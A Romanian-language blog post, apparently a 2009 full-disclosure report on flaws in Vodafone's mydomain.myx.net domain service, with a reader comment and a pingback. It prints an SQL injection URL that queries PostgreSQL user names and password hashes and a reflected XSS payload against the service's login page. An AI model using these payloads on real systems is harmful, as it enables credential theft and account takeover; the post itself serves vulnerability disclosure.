Loading....
Loading....

    Posted by 2fingers in English News

    Posted on January 24th, 2009

    Raportat de xZu:

    Salut,
    In primul rand doresc sa va multumesc ca ati citit mesajele trimise,iar in al doilea sa va anunt despre problemele
    mydomain.myx.net
    Sql injection :
    http://mydomain.myx.net/support/?t=4&m=11&l=48%20or%201=1;%20SELECT%20usename,%20passwd%20FROM%20pg_user
    XSS :
    http://mydomain.myx.net/login/parola/?domain=xss:|&domain_type=“><script>alert(‘XSS’)</script>
    O seara buna !

    Free Image Hosting at www.ImageShack.us

    Free Image Hosting at www.ImageShack.us


    Nu prea mai este nimic de comentat. In clipa in care o asemenea scapare te poate lasa fara domeniul cumparat incepi sa te gandesti mai bine daca are rost sa cumperi domenii folosind serviciile romanesti. Sper ca va fi rezolvata rapid situatia. Alte doua persoane de incredere mi-au spus ca au mai gasit diferiti parametri cu probleme in respectivul serviciu. Ii sfatuim pe cei de la Vodafone sa verifice fiecare fisier in parte preferabil de catre mai multi oameni care se pricep.

    Vulnerabilitate raportata prin mail dar si full disclosure facut deja aici ( vizualizarea necesita username).

    Multumim xZu.

    Related Posts

    2 Responses to “Asa chiar nu e voie – mydomain.myx.net”

    1. Ochelaristu Says:

      un exemplu cu site real: http://mydomain.myx.net/login/parola/?domain=achmb&domain_type=ro

    2. Horațiu’s » Myx MyDomain de la Vodafone sucks! Says:

      [...] asta lunga și plicticoasă) că portalul MyxMyDomain a fost “spart” puțin (sursa: hackersblog.org) prin metode nu foarte complicate pentru cei care se pricep la SQL [...]

    Leave a Reply